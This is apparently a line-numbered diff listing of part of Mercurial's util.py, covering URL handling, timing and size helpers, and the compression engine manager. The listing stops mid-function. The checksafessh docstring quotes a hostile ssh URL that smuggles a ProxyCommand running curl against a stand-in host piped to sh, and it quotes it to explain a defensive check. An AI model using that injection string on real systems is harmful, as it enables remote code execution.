3067 elif (self.host is not None and self.path
3063 and not hasdriveletter(path)):
3068 and not hasdriveletter(path)):
3064 path = '/' + path
3069 path = '/' + path
3065 return path
3070 return path
3066 return self._origpath
3071 return self._origpath
3067
3072
3068 def islocal(self):
3073 def islocal(self):
3069 '''whether localpath will return something that posixfile can open'''
3074 '''whether localpath will return something that posixfile can open'''
3070 return (not self.scheme or self.scheme == 'file'
3075 return (not self.scheme or self.scheme == 'file'
3071 or self.scheme == 'bundle')
3076 or self.scheme == 'bundle')
3072
3077
3073 def hasscheme(path):
3078 def hasscheme(path):
3074 return bool(url(path).scheme)
3079 return bool(url(path).scheme)
3075
3080
3076 def hasdriveletter(path):
3081 def hasdriveletter(path):
3077 return path and path[1:2] == ':' and path[0:1].isalpha()
3082 return path and path[1:2] == ':' and path[0:1].isalpha()
3078
3083
3079 def urllocalpath(path):
3084 def urllocalpath(path):
3080 return url(path, parsequery=False, parsefragment=False).localpath()
3085 return url(path, parsequery=False, parsefragment=False).localpath()
3081
3086
3082 def checksafessh(path):
3087 def checksafessh(path):
3083 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3088 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3084
3089
3085 This is a sanity check for ssh urls. ssh will parse the first item as
3090 This is a sanity check for ssh urls. ssh will parse the first item as
3086 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3091 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3087 Let's prevent these potentially exploited urls entirely and warn the
3092 Let's prevent these potentially exploited urls entirely and warn the
3088 user.
3093 user.
3089
3094
3090 Raises an error.Abort when the url is unsafe.
3095 Raises an error.Abort when the url is unsafe.
3091 """
3096 """
3092 path = urlreq.unquote(path)
3097 path = urlreq.unquote(path)
3093 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3098 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3094 raise error.Abort(_('potentially unsafe url: %r') %
3099 raise error.Abort(_('potentially unsafe url: %r') %
3095 (path,))
3100 (path,))
3096
3101
3097 def hidepassword(u):
3102 def hidepassword(u):
3098 '''hide user credential in a url string'''
3103 '''hide user credential in a url string'''
3099 u = url(u)
3104 u = url(u)
3100 if u.passwd:
3105 if u.passwd:
3101 u.passwd = '***'
3106 u.passwd = '***'
3102 return bytes(u)
3107 return bytes(u)
3103
3108
3104 def removeauth(u):
3109 def removeauth(u):
3105 '''remove all authentication information from a url string'''
3110 '''remove all authentication information from a url string'''
3106 u = url(u)
3111 u = url(u)
3107 u.user = u.passwd = None
3112 u.user = u.passwd = None
3108 return str(u)
3113 return str(u)
3109
3114
3110 timecount = unitcountfn(
3115 timecount = unitcountfn(
3111 (1, 1e3, _('%.0f s')),
3116 (1, 1e3, _('%.0f s')),
3112 (100, 1, _('%.1f s')),
3117 (100, 1, _('%.1f s')),
3113 (10, 1, _('%.2f s')),
3118 (10, 1, _('%.2f s')),
3114 (1, 1, _('%.3f s')),
3119 (1, 1, _('%.3f s')),
3115 (100, 0.001, _('%.1f ms')),
3120 (100, 0.001, _('%.1f ms')),
3116 (10, 0.001, _('%.2f ms')),
3121 (10, 0.001, _('%.2f ms')),
3117 (1, 0.001, _('%.3f ms')),
3122 (1, 0.001, _('%.3f ms')),
3118 (100, 0.000001, _('%.1f us')),
3123 (100, 0.000001, _('%.1f us')),
3119 (10, 0.000001, _('%.2f us')),
3124 (10, 0.000001, _('%.2f us')),
3120 (1, 0.000001, _('%.3f us')),
3125 (1, 0.000001, _('%.3f us')),
3121 (100, 0.000000001, _('%.1f ns')),
3126 (100, 0.000000001, _('%.1f ns')),
3122 (10, 0.000000001, _('%.2f ns')),
3127 (10, 0.000000001, _('%.2f ns')),
3123 (1, 0.000000001, _('%.3f ns')),
3128 (1, 0.000000001, _('%.3f ns')),
3124 )
3129 )
3125
3130
3126 _timenesting = [0]
3131 _timenesting = [0]
3127
3132
3128 def timed(func):
3133 def timed(func):
3129 '''Report the execution time of a function call to stderr.
3134 '''Report the execution time of a function call to stderr.
3130
3135
3131 During development, use as a decorator when you need to measure
3136 During development, use as a decorator when you need to measure
3132 the cost of a function, e.g. as follows:
3137 the cost of a function, e.g. as follows:
3133
3138
3134 @util.timed
3139 @util.timed
3135 def foo(a, b, c):
3140 def foo(a, b, c):
3136 pass
3141 pass
3137 '''
3142 '''
3138
3143
3139 def wrapper(*args, **kwargs):
3144 def wrapper(*args, **kwargs):
3140 start = timer()
3145 start = timer()
3141 indent = 2
3146 indent = 2
3142 _timenesting[0] += indent
3147 _timenesting[0] += indent
3143 try:
3148 try:
3144 return func(*args, **kwargs)
3149 return func(*args, **kwargs)
3145 finally:
3150 finally:
3146 elapsed = timer() - start
3151 elapsed = timer() - start
3147 _timenesting[0] -= indent
3152 _timenesting[0] -= indent
3148 stderr.write('%s%s: %s\n' %
3153 stderr.write('%s%s: %s\n' %
3149 (' ' * _timenesting[0], func.__name__,
3154 (' ' * _timenesting[0], func.__name__,
3150 timecount(elapsed)))
3155 timecount(elapsed)))
3151 return wrapper
3156 return wrapper
3152
3157
3153 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3158 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3154 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3159 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3155
3160
3156 def sizetoint(s):
3161 def sizetoint(s):
3157 '''Convert a space specifier to a byte count.
3162 '''Convert a space specifier to a byte count.
3158
3163
3159 >>> sizetoint(b'30')
3164 >>> sizetoint(b'30')
3160 30
3165 30
3161 >>> sizetoint(b'2.2kb')
3166 >>> sizetoint(b'2.2kb')
3162 2252
3167 2252
3163 >>> sizetoint(b'6M')
3168 >>> sizetoint(b'6M')
3164 6291456
3169 6291456
3165 '''
3170 '''
3166 t = s.strip().lower()
3171 t = s.strip().lower()
3167 try:
3172 try:
3168 for k, u in _sizeunits:
3173 for k, u in _sizeunits:
3169 if t.endswith(k):
3174 if t.endswith(k):
3170 return int(float(t[:-len(k)]) * u)
3175 return int(float(t[:-len(k)]) * u)
3171 return int(t)
3176 return int(t)
3172 except ValueError:
3177 except ValueError:
3173 raise error.ParseError(_("couldn't parse size: %s") % s)
3178 raise error.ParseError(_("couldn't parse size: %s") % s)
3174
3179
3175 class hooks(object):
3180 class hooks(object):
3176 '''A collection of hook functions that can be used to extend a
3181 '''A collection of hook functions that can be used to extend a
3177 function's behavior. Hooks are called in lexicographic order,
3182 function's behavior. Hooks are called in lexicographic order,
3178 based on the names of their sources.'''
3183 based on the names of their sources.'''
3179
3184
3180 def __init__(self):
3185 def __init__(self):
3181 self._hooks = []
3186 self._hooks = []
3182
3187
3183 def add(self, source, hook):
3188 def add(self, source, hook):
3184 self._hooks.append((source, hook))
3189 self._hooks.append((source, hook))
3185
3190
3186 def __call__(self, *args):
3191 def __call__(self, *args):
3187 self._hooks.sort(key=lambda x: x[0])
3192 self._hooks.sort(key=lambda x: x[0])
3188 results = []
3193 results = []
3189 for source, hook in self._hooks:
3194 for source, hook in self._hooks:
3190 results.append(hook(*args))
3195 results.append(hook(*args))
3191 return results
3196 return results
3192
3197
3193 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3198 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3194 '''Yields lines for a nicely formatted stacktrace.
3199 '''Yields lines for a nicely formatted stacktrace.
3195 Skips the 'skip' last entries, then return the last 'depth' entries.
3200 Skips the 'skip' last entries, then return the last 'depth' entries.
3196 Each file+linenumber is formatted according to fileline.
3201 Each file+linenumber is formatted according to fileline.
3197 Each line is formatted according to line.
3202 Each line is formatted according to line.
3198 If line is None, it yields:
3203 If line is None, it yields:
3199 length of longest filepath+line number,
3204 length of longest filepath+line number,
3200 filepath+linenumber,
3205 filepath+linenumber,
3201 function
3206 function
3202
3207
3203 Not be used in production code but very convenient while developing.
3208 Not be used in production code but very convenient while developing.
3204 '''
3209 '''
3205 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3210 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3206 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3211 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3207 ][-depth:]
3212 ][-depth:]
3208 if entries:
3213 if entries:
3209 fnmax = max(len(entry[0]) for entry in entries)
3214 fnmax = max(len(entry[0]) for entry in entries)
3210 for fnln, func in entries:
3215 for fnln, func in entries:
3211 if line is None:
3216 if line is None:
3212 yield (fnmax, fnln, func)
3217 yield (fnmax, fnln, func)
3213 else:
3218 else:
3214 yield line % (fnmax, fnln, func)
3219 yield line % (fnmax, fnln, func)
3215
3220
3216 def debugstacktrace(msg='stacktrace', skip=0,
3221 def debugstacktrace(msg='stacktrace', skip=0,
3217 f=stderr, otherf=stdout, depth=0):
3222 f=stderr, otherf=stdout, depth=0):
3218 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3223 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3219 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3224 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3220 By default it will flush stdout first.
3225 By default it will flush stdout first.
3221 It can be used everywhere and intentionally does not require an ui object.
3226 It can be used everywhere and intentionally does not require an ui object.
3222 Not be used in production code but very convenient while developing.
3227 Not be used in production code but very convenient while developing.
3223 '''
3228 '''
3224 if otherf:
3229 if otherf:
3225 otherf.flush()
3230 otherf.flush()
3226 f.write('%s at:\n' % msg.rstrip())
3231 f.write('%s at:\n' % msg.rstrip())
3227 for line in getstackframes(skip + 1, depth=depth):
3232 for line in getstackframes(skip + 1, depth=depth):
3228 f.write(line)
3233 f.write(line)
3229 f.flush()
3234 f.flush()
3230
3235
3231 class dirs(object):
3236 class dirs(object):
3232 '''a multiset of directory names from a dirstate or manifest'''
3237 '''a multiset of directory names from a dirstate or manifest'''
3233
3238
3234 def __init__(self, map, skip=None):
3239 def __init__(self, map, skip=None):
3235 self._dirs = {}
3240 self._dirs = {}
3236 addpath = self.addpath
3241 addpath = self.addpath
3237 if safehasattr(map, 'iteritems') and skip is not None:
3242 if safehasattr(map, 'iteritems') and skip is not None:
3238 for f, s in map.iteritems():
3243 for f, s in map.iteritems():
3239 if s[0] != skip:
3244 if s[0] != skip:
3240 addpath(f)
3245 addpath(f)
3241 else:
3246 else:
3242 for f in map:
3247 for f in map:
3243 addpath(f)
3248 addpath(f)
3244
3249
3245 def addpath(self, path):
3250 def addpath(self, path):
3246 dirs = self._dirs
3251 dirs = self._dirs
3247 for base in finddirs(path):
3252 for base in finddirs(path):
3248 if base in dirs:
3253 if base in dirs:
3249 dirs[base] += 1
3254 dirs[base] += 1
3250 return
3255 return
3251 dirs[base] = 1
3256 dirs[base] = 1
3252
3257
3253 def delpath(self, path):
3258 def delpath(self, path):
3254 dirs = self._dirs
3259 dirs = self._dirs
3255 for base in finddirs(path):
3260 for base in finddirs(path):
3256 if dirs[base] > 1:
3261 if dirs[base] > 1:
3257 dirs[base] -= 1
3262 dirs[base] -= 1
3258 return
3263 return
3259 del dirs[base]
3264 del dirs[base]
3260
3265
3261 def __iter__(self):
3266 def __iter__(self):
3262 return iter(self._dirs)
3267 return iter(self._dirs)
3263
3268
3264 def __contains__(self, d):
3269 def __contains__(self, d):
3265 return d in self._dirs
3270 return d in self._dirs
3266
3271
3267 if safehasattr(parsers, 'dirs'):
3272 if safehasattr(parsers, 'dirs'):
3268 dirs = parsers.dirs
3273 dirs = parsers.dirs
3269
3274
3270 def finddirs(path):
3275 def finddirs(path):
3271 pos = path.rfind('/')
3276 pos = path.rfind('/')
3272 while pos != -1:
3277 while pos != -1:
3273 yield path[:pos]
3278 yield path[:pos]
3274 pos = path.rfind('/', 0, pos)
3279 pos = path.rfind('/', 0, pos)
3275
3280
3276 # compression code
3281 # compression code
3277
3282
3278 SERVERROLE = 'server'
3283 SERVERROLE = 'server'
3279 CLIENTROLE = 'client'
3284 CLIENTROLE = 'client'
3280
3285
3281 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3286 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3282 (u'name', u'serverpriority',
3287 (u'name', u'serverpriority',
3283 u'clientpriority'))
3288 u'clientpriority'))
3284
3289
3285 class compressormanager(object):
3290 class compressormanager(object):
3286 """Holds registrations of various compression engines.
3291 """Holds registrations of various compression engines.
3287
3292
3288 This class essentially abstracts the differences between compression
3293 This class essentially abstracts the differences between compression
3289 engines to allow new compression formats to be added easily, possibly from
3294 engines to allow new compression formats to be added easily, possibly from
3290 extensions.
3295 extensions.
3291
3296
3292 Compressors are registered against the global instance by calling its
3297 Compressors are registered against the global instance by calling its
3293 ``register()`` method.
3298 ``register()`` method.
3294 """
3299 """
3295 def __init__(self):
3300 def __init__(self):
3296 self._engines = {}
3301 self._engines = {}
3297 # Bundle spec human name to engine name.
3302 # Bundle spec human name to engine name.
3298 self._bundlenames = {}
3303 self._bundlenames = {}
3299 # Internal bundle identifier to engine name.
3304 # Internal bundle identifier to engine name.
3300 self._bundletypes = {}
3305 self._bundletypes = {}
3301 # Revlog header to engine name.
3306 # Revlog header to engine name.
3302 self._revlogheaders = {}
3307 self._revlogheaders = {}
3303 # Wire proto identifier to engine name.
3308 # Wire proto identifier to engine name.
3304 self._wiretypes = {}
3309 self._wiretypes = {}
3305
3310
3306 def __getitem__(self, key):
3311 def __getitem__(self, key):
3307 return self._engines[key]
3312 return self._engines[key]
3308
3313
3309 def __contains__(self, key):
3314 def __contains__(self, key):
3310 return key in self._engines
3315 return key in self._engines
3311
3316
3312 def __iter__(self):
3317 def __iter__(self):
3313 return iter(self._engines.keys())
3318 return iter(self._engines.keys())
3314
3319
3315 def register(self, engine):
3320 def register(self, engine):
3316 """Register a compression engine with the manager.
3321 """Register a compression engine with the manager.
3317
3322
3318 The argument must be a ``compressionengine`` instance.
3323 The argument must be a ``compressionengine`` instance.
3319 """
3324 """
3320 if not isinstance(engine, compressionengine):
3325 if not isinstance(engine, compressionengine):
3321 raise ValueError(_('argument must be a compressionengine'))
3326 raise ValueError(_('argument must be a compressionengine'))
3322
3327
3323 name = engine.name()
3328 name = engine.name()
3324
3329
3325 if name in self._engines:
3330 if name in self._engines:
3326 raise error.Abort(_('compression engine %s already registered') %
3331 raise error.Abort(_('compression engine %s already registered') %
3327 name)
3332 name)
3328
3333
3329 bundleinfo = engine.bundletype()
3334 bundleinfo = engine.bundletype()
3330 if bundleinfo:
3335 if bundleinfo:
3331 bundlename, bundletype = bundleinfo
3336 bundlename, bundletype = bundleinfo
3332
3337
3333 if bundlename in self._bundlenames:
3338 if bundlename in self._bundlenames:
3334 raise error.Abort(_('bundle name %s already registered') %
3339 raise error.Abort(_('bundle name %s already registered') %
3335 bundlename)
3340 bundlename)
3336 if bundletype in self._bundletypes:
3341 if bundletype in self._bundletypes:
3337 raise error.Abort(_('bundle type %s already registered by %s') %
3342 raise error.Abort(_('bundle type %s already registered by %s') %
3338 (bundletype, self._bundletypes[bundletype]))
3343 (bundletype, self._bundletypes[bundletype]))
3339
3344
3340 # No external facing name declared.
3345 # No external facing name declared.
3341 if bundlename:
3346 if bundlename:
3342 self._bundlenames[bundlename] = name
3347 self._bundlenames[bundlename] = name
3343
3348
3344 self._bundletypes[bundletype] = name
3349 self._bundletypes[bundletype] = name
3345
3350
3346 wiresupport = engine.wireprotosupport()
3351 wiresupport = engine.wireprotosupport()
3347 if wiresupport:
3352 if wiresupport:
3348 wiretype = wiresupport.name
3353 wiretype = wiresupport.name
3349 if wiretype in self._wiretypes:
3354 if wiretype in self._wiretypes:
3350 raise error.Abort(_('wire protocol compression %s already '
3355 raise error.Abort(_('wire protocol compression %s already '
3351 'registered by %s') %
3356 'registered by %s') %
3352 (wiretype, self._wiretypes[wiretype]))
3357 (wiretype, self._wiretypes[wiretype]))
3353
3358
3354 self._wiretypes[wiretype] = name
3359 self._wiretypes[wiretype] = name
3355
3360
3356 revlogheader = engine.revlogheader()
3361 revlogheader = engine.revlogheader()
3357 if revlogheader and revlogheader in self._revlogheaders:
3362 if revlogheader and revlogheader in self._revlogheaders:
3358 raise error.Abort(_('revlog header %s already registered by %s') %
3363 raise error.Abort(_('revlog header %s already registered by %s') %
3359 (revlogheader, self._revlogheaders[revlogheader]))
3364 (revlogheader, self._revlogheaders[revlogheader]))
3360
3365
3361 if revlogheader:
3366 if revlogheader:
3362 self._revlogheaders[revlogheader] = name
3367 self._revlogheaders[revlogheader] = name
3363
3368
3364 self._engines[name] = engine
3369 self._engines[name] = engine
3365
3370
3366 @property
3371 @property
3367 def supportedbundlenames(self):
3372 def supportedbundlenames(self):
3368 return set(self._bundlenames.keys())
3373 return set(self._bundlenames.keys())
3369
3374
3370 @property
3375 @property
3371 def supportedbundletypes(self):
3376 def supportedbundletypes(self):
3372 return set(self._bundletypes.keys())
3377 return set(self._bundletypes.keys())
3373
3378
3374 def forbundlename(self, bundlename):
3379 def forbundlename(self, bundlename):
3375 """Obtain a compression engine registered to a bundle name.
3380 """Obtain a compression engine registered to a bundle name.
3376
3381
3377 Will raise KeyError if the bundle type isn't registered.
3382 Will raise KeyError if the bundle type isn't registered.
3378
3383
3379 Will abort if the engine is known but not available.
3384 Will abort if the engine is known but not available.
3380 """
3385 """
3381 engine = self._engines[self._bundlenames[bundlename]]
3386 engine = self._engines[self._bundlenames[bundlename]]
3382 if not engine.available():
3387 if not engine.available():
3383 raise error.Abort(_('compression engine %s could not be loaded') %
3388 raise error.Abort(_('compression engine %s could not be loaded') %
3384 engine.name())
3389 engine.name())
3385 return engine
3390 return engine
3386
3391
3387 def forbundletype(self, bundletype):
3392 def forbundletype(self, bundletype):
3388 """Obtain a compression engine registered to a bundle type.
3393 """Obtain a compression engine registered to a bundle type.
3389
3394
3390 Will raise KeyError if the bundle type isn't registered.
3395 Will raise KeyError if the bundle type isn't registered.
3391
3396
3392 Will abort if the engine is known but not available.
3397 Will abort if the engine is known but not available.
3393 """
3398 """
3394 engine = self._engines[self._bundletypes[bundletype]]
3399 engine = self._engines[self._bundletypes[bundletype]]
3395 if not engine.available():
3400 if not engine.available():
3396 raise error.Abort(_('compression engine %s could not be loaded') %
3401 raise error.Abort(_('compression engine %s could not be loaded') %
3397 engine.name())
3402 engine.name())
3398 return engine
3403 return engine
3399
3404
3400 def supportedwireengines(self, role, onlyavailable=True):
3405 def supportedwireengines(self, role, onlyavailable=True):
3401 """Obtain compression engines that support the wire protocol.
3406 """Obtain compression engines that support the wire protocol.
3402
3407
3403 Returns a list of engines in prioritized order, most desired first.
3408 Returns a list of engines in prioritized order, most desired first.
3404
3409
3405 If ``onlyavailable`` is set, filter out engines that can't be
3410 If ``onlyavailable`` is set, filter out engines that can't be
3406 loaded.
3411 loaded.
3407 """
3412 """
3408 assert role in (SERVERROLE, CLIENTROLE)
3413 assert role in (SERVERROLE, CLIENTROLE)
3409
3414
3410 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3415 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3411
3416
3412 engines = [self._engines[e] for e in self._wiretypes.values()]
3417 engines = [self._engines[e] for e in self._wiretypes.values()]
3413 if onlyavailable:
3418 if onlyavailable:
3414 engines = [e for e in engines if e.available()]
3419 engines = [e for e in engines if e.available()]
3415
3420
3416 def getkey(e):
3421 def getkey(e):
3417 # Sort first by priority, highest first. In case of tie, sort
3422 # Sort first by priority, highest first. In case of tie, sort
3418 # alphabetically. This is arbitrary, but ensures output is
3423 # alphabetically. This is arbitrary, but ensures output is
3419 # stable.
3424 # stable.
3420 w = e.wireprotosupport()
3425 w = e.wireprotosupport()
3421 return -1 * getattr(w, attr), w.name
3426 return -1 * getattr(w, attr), w.name
3422
3427
3423 return list(sorted(engines, key=getkey))
3428 return list(sorted(engines, key=getkey))
3424
3429
3425 def forwiretype(self, wiretype):
3430 def forwiretype(self, wiretype):
3426 engine = self._engines[self._wiretypes[wiretype]]
3431 engine = self._engines[self._wiretypes[wiretype]]
3427 if not engine.available():
3432 if not engine.available():
3428 raise error.Abort(_('compression engine %s could not be loaded') %
3433 raise error.Abort(_('compression engine %s could not be loaded') %
3429 engine.name())
3434 engine.name())
3430 return engine
3435 return engine
3431
3436
3432 def forrevlogheader(self, header):
3437 def forrevlogheader(self, header):
3433 """Obtain a compression engine registered to a revlog header.
3438 """Obtain a compression engine registered to a revlog header.
3434
3439
3435 Will raise KeyError if the revlog header value isn't registered.
3440 Will raise KeyError if the revlog header value isn't registered.
3436 """
3441 """
3437 return self._engines[self._revlogheaders[header]]
3442 return self._engines[self._revlogheaders[header]]
3438
3443
3439 compengines = compressormanager()
3444 compengines = compressormanager()
3440
3445
3441 class compressionengine(object):
3446 class compressionengine(object):
3442 """Base class for compression engines.
3447 """Base class for compression engines.
3443
3448
3444 Compression engines must implement the interface defined by this class.
3449 Compression engines must implement the interface defined by this class.
3445 """
3450 """
3446 def name(self):
3451 def name(self):
3447 """Returns the name of the compression engine.
3452 """Returns the name of the compression engine.
3448
3453
3449 This is the key the engine is registered under.
3454 This is the key the engine is registered under.
3450
3455
3451 This method must be implemented.
3456 This method must be implemented.
3452 """
3457 """
3453 raise NotImplementedError()
3458 raise NotImplementedError()
3454
3459
3455 def available(self):
3460 def available(self):
3456 """Whether the compression engine is available.
3461 """Whether the compression engine is available.
3457
3462
3458 The intent of this method is to allow optional compression engines
3463 The intent of this method is to allow optional compression engines
3459 that may not be available in all installations (such as engines relying
3464 that may not be available in all installations (such as engines relying
3460 on C extensions that may not be present).
3465 on C extensions that may not be present).
3461 """
3466 """
3462 return True
3467 return True
3463
3468
3464 def bundletype(self):
3469 def bundletype(self):
3465 """Describes bundle identifiers for this engine.
3470 """Describes bundle identifiers for this engine.
3466
3471
3467 If this compression engine isn't supported for bundles, returns None.
3472 If this compression engine isn't supported for bundles, returns None.
3468
3473
3469 If this engine can be used for bundles, returns a 2-tuple of strings of
3474 If this engine can be used for bundles, returns a 2-tuple of strings of
3470 the user-facing "bundle spec" compression name and an internal
3475 the user-facing "bundle spec" compression name and an internal
3471 identifier used to denote the compression format within bundles. To
3476 identifier used to denote the compression format within bundles. To
3472 exclude the name from external usage, set the first element to ``None``.
3477 exclude the name from external usage, set the first element to ``None``.
3473
3478
3474 If bundle compression is supported, the class must also implement
3479 If bundle compression is supported, the class must also implement
3475 ``compressstream`` and `decompressorreader``.
3480 ``compressstream`` and `decompressorreader``.
3476
3481
3477 The docstring of this method is used in the help system to tell users
3482 The docstring of this method is used in the help system to tell users
3478 about this engine.
3483 about this engine.
3479 """
3484 """
3480 return None
3485 return None
3481
3486
3482 def wireprotosupport(self):
3487 def wireprotosupport(self):
3483 """Declare support for this compression format on the wire protocol.
3488 """Declare support for this compression format on the wire protocol.
3484
3489
3485 If this compression engine isn't supported for compressing wire
3490 If this compression engine isn't supported for compressing wire
3486 protocol payloads, returns None.
3491 protocol payloads, returns None.
3487
3492
3488 Otherwise, returns ``compenginewireprotosupport`` with the following
3493 Otherwise, returns ``compenginewireprotosupport`` with the following
3489 fields:
3494 fields:
3490
3495
3491 * String format identifier
3496 * String format identifier
3492 * Integer priority for the server
3497 * Integer priority for the server
3493 * Integer priority for the client
3498 * Integer priority for the client
3494
3499
3495 The integer priorities are used to order the advertisement of format
3500 The integer priorities are used to order the advertisement of format
3496 support by server and client. The highest integer is advertised
3501 support by server and client. The highest integer is advertised
3497 first. Integers with non-positive values aren't advertised.
3502 first. Integers with non-positive values aren't advertised.
3498
3503
3499 The priority values are somewhat arbitrary and only used for default
3504 The priority values are somewhat arbitrary and only used for default
3500 ordering. The relative order can be changed via config options.
3505 ordering. The relative order can be changed via config options.
3501
3506
3502 If wire protocol compression is supported, the class must also implement
3507 If wire protocol compression is supported, the class must also implement
3503 ``compressstream`` and ``decompressorreader``.
3508 ``compressstream`` and ``decompressorreader``.
3504 """
3509 """
3505 return None
3510 return None
3506
3511
3507 def revlogheader(self):
3512 def revlogheader(self):
3508 """Header added to revlog chunks that identifies this engine.
3513 """Header added to revlog chunks that identifies this engine.
3509
3514
3510 If this engine can be used to compress revlogs, this method should
3515 If this engine can be used to compress revlogs, this method should
3511 return the bytes used to identify chunks compressed with this engine.
3516 return the bytes used to identify chunks compressed with this engine.
3512 Else, the method should return ``None`` to indicate it does not
3517 Else, the method should return ``None`` to indicate it does not
3513 participate in revlog compression.
3518 participate in revlog compression.
3514 """
3519 """
3515 return None
3520 return None
3516
3521
3517 def compressstream(self, it, opts=None):
3522 def compressstream(self, it, opts=None):
3518 """Compress an iterator of chunks.
3523 """Compress an iterator of chunks.
3519
3524
3520 The method receives an iterator (ideally a generator) of chunks of
3525 The method receives an iterator (ideally a generator) of chunks of
3521 bytes to be compressed. It returns an iterator (ideally a generator)
3526 bytes to be compressed. It returns an iterator (ideally a generator)
3522 of bytes of chunks representing the compressed output.
3527 of bytes of chunks representing the compressed output.
3523
3528
3524 Optionally accepts an argument defining how to perform compression.
3529 Optionally accepts an argument defining how to perform compression.
3525 Each engine treats this argument differently.
3530 Each engine treats this argument differently.
3526 """
3531 """
3527 raise NotImplementedError()
3532 raise NotImplementedError()
3528
3533
3529 def decompressorreader(self, fh):
3534 def decompressorreader(self, fh):
3530 """Perform decompression on a file object.
3535 """Perform decompression on a file object.
3531
3536
3532 Argument is an object with a ``read(size)`` method that returns
3537 Argument is an object with a ``read(size)`` method that returns
3533 compressed data. Return value is an object with a ``read(size)`` that
3538 compressed data. Return value is an object with a ``read(size)`` that
3534 returns uncompressed data.
3539 returns uncompressed data.
3535 """
3540 """
3536 raise NotImplementedError()
3541 raise NotImplementedError()
3537
3542
3538 def revlogcompressor(self, opts=None):
3543 def revlogcompressor(self, opts=None):
3539 """Obtain an object that can be used to compress revlog entries.
3544 """Obtain an object that can be used to compress revlog entries.
3540
3545
3541 The object has a ``compress(data)`` method that compresses binary
3546 The object has a ``compress(data)`` method that compresses binary
3542 data. This method returns compressed binary data or ``None`` if
3547 data. This method returns compressed binary data or ``None`` if
3543 the data could not be compressed (too small, not compressible, etc).
3548 the data could not be compressed (too small, not compressible, etc).
3544 The returned data should have a header uniquely identifying this
3549 The returned data should have a header uniquely identifying this
3545 compression format so decompression can be routed to this engine.
3550 compression format so decompression can be routed to this engine.
3546 This header should be identified by the ``revlogheader()`` return
3551 This header should be identified by the ``revlogheader()`` return
3547 value.
3552 value.
3548
3553
3549 The object has a ``decompress(data)`` method that decompresses
3554 The object has a ``decompress(data)`` method that decompresses
3550 data. The method will only be called if ``data`` begins with
3555 data. The method will only be called if ``data`` begins with
3551 ``revlogheader()``. The method should return the raw, uncompressed
3556 ``revlogheader()``. The method should return the raw, uncompressed
3552 data or raise a ``RevlogError``.
3557 data or raise a ``RevlogError``.
3553
3558
3554 The object is reusable but is not thread safe.
3559 The object is reusable but is not thread safe.
3555 """
3560 """
3556 raise NotImplementedError()
3561 raise NotImplementedError()
3557
3562
3558 class _zlibengine(compressionengine):
3563 class _zlibengine(compressionengine):
3559 def name(self):
3564 def name(self):
3560 return 'zlib'
3565 return 'zlib'
3561
3566
3562 def bundletype(self):
3567 def bundletype(self):
3563 """zlib compression using the DEFLATE algorithm.
3568 """zlib compression using the DEFLATE algorithm.
3564
3569
3565 All Mercurial clients should support this format. The compression
3570 All Mercurial clients should support this format. The compression
3566 algorithm strikes a reasonable balance between compression ratio
3571 algorithm strikes a reasonable balance between compression ratio
3567 and size.
3572 and size.
3568 """
3573 """
3569 return 'gzip', 'GZ'
3574 return 'gzip', 'GZ'
3570
3575
3571 def wireprotosupport(self):
3576 def wireprotosupport(self):
3572 return compewireprotosupport('zlib', 20, 20)
3577 return compewireprotosupport('zlib', 20, 20)
3573
3578
3574 def revlogheader(self):
3579 def revlogheader(self):
3575 return 'x'
3580 return 'x'
3576
3581
3577 def compressstream(self, it, opts=None):
3582 def compressstream(self, it, opts=None):
3578 opts = opts or {}
3583 opts = opts or {}
3579
3584
3580 z = zlib.compressobj(opts.get('level', -1))
3585 z = zlib.compressobj(opts.get('level', -1))
3581 for chunk in it:
3586 for chunk in it:
3582 data = z.compress(chunk)
3587 data = z.compress(chunk)
3583 # Not all calls to compress emit data. It is cheaper to inspect
3588 # Not all calls to compress emit data. It is cheaper to inspect
3584 # here than to feed empty chunks through generator.
3589 # here than to feed empty chunks through generator.
3585 if data:
3590 if data:
3586 yield data
3591 yield data
3587
3592
3588 yield z.flush()
3593 yield z.flush()
3589
3594
3590 def decompressorreader(self, fh):
3595 def decompressorreader(self, fh):
3591 def gen():
3596 def gen():
3592 d = zlib.decompressobj()
3597 d = zlib.decompressobj()
3593 for chunk in filechunkiter(fh):
3598 for chunk in filechunkiter(fh):
3594 while chunk:
3599 while chunk:
3595 # Limit output size to limit memory.
3600 # Limit output size to limit memory.
3596 yield d.decompress(chunk, 2 ** 18)
3601 yield d.decompress(chunk, 2 ** 18)
3597 chunk = d.unconsumed_tail
3602 chunk = d.unconsumed_tail
3598
3603
3599 return chunkbuffer(gen())
3604 return chunkbuffer(gen())
3600
3605
3601 class zlibrevlogcompressor(object):
3606 class zlibrevlogcompressor(object):
3602 def compress(self, data):
3607 def compress(self, data):
3603 insize = len(data)
3608 insize = len(data)
3604 # Caller handles empty input case.
3609 # Caller handles empty input case.
3605 assert insize > 0
3610 assert insize > 0
3606
3611
3607 if insize < 44:
3612 if insize < 44:
3608 return None
3613 return None
3609
3614
3610 elif insize <= 1000000:
3615 elif insize <= 1000000:
3611 compressed = zlib.compress(data)
3616 compressed = zlib.compress(data)
3612 if len(compressed) < insize:
3617 if len(compressed) < insize:
